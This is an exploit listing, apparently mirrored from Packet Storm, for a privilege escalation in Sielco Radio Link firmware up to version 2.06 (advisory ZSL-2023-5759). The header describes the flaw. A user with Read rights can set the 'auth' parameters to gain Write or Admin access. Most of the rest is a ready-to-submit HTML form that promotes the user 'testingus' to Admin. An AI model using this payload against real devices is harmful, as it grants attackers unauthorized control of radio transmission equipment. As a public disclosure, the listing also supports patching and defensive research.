Share
## https://sploitus.com/exploit?id=PACKETSTORM:171849
<!--  
  
  
Sielco Radio Link 2.06 Remote Privilege Escalation  
  
  
Vendor: Sielco S.r.l  
Product web page: https://www.sielco.org  
Affected version: 2.06 (RTX19)  
2.05 (RTX19)  
2.00 (EXC19)  
1.60 (RTX19)  
1.59 (RTX19)  
1.55 (EXC19)  
  
Summary: Sielco develops and produces radio links for all transmission  
and reception needs, thanks to innovative units and excellent performances,  
accompanied by a high reliability and low consumption.  
  
Desc: The application suffers from a privilege escalation vulnerability.  
A user with Read permissions can elevate his/her privileges by sending  
a HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3'  
to integer value '1' for Write or '2' for Admin permissions.  
  
Tested on: lwIP/2.1.1  
Web/2.9.3  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2023-5759  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5759.php  
  
  
26.01.2023  
  
-->  
  
  
<html>  
<body>  
<form action="http://radiolink/protect/users_rx.htm" method="POST">  
<input type="hidden" name="pwd0" value="" />  
<input type="hidden" name="pwd0bis" value="" />  
<input type="hidden" name="user1" value="testingus" />  
<input type="hidden" name="pwd1" value="" />  
<input type="hidden" name="pwd1bis" value="" />  
<input type="hidden" name="auth1" value="2" />  
<input type="hidden" name="user2" value="" />  
<input type="hidden" name="pwd2" value="" />  
<input type="hidden" name="pwd2bis" value="" />  
<input type="hidden" name="auth2" value="0" />  
<input type="hidden" name="user3" value="" />  
<input type="hidden" name="pwd3" value="" />  
<input type="hidden" name="pwd3bis" value="" />  
<input type="hidden" name="auth3" value="0" />  
<input type="submit" value="Escalate" />  
</form>  
</body>  
</html>